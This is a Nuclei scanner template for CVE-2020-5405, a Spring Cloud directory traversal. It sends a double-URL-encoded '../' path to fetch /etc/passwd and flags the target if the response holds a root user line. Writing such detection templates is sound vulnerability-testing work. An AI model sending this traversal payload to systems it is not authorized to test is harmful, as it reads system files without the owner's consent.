nuclei-templates/cves/CVE-2020-5405.yaml

23 lines
471 B
YAML

id: cve-2020-5405
info:
name: Spring Cloud Directory Traversal
author: Harsh Bothra
severity: high
# source:- https://nvd.nist.gov/vuln/detail/CVE-2020-5405
requests:
- method: GET
path:
- '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body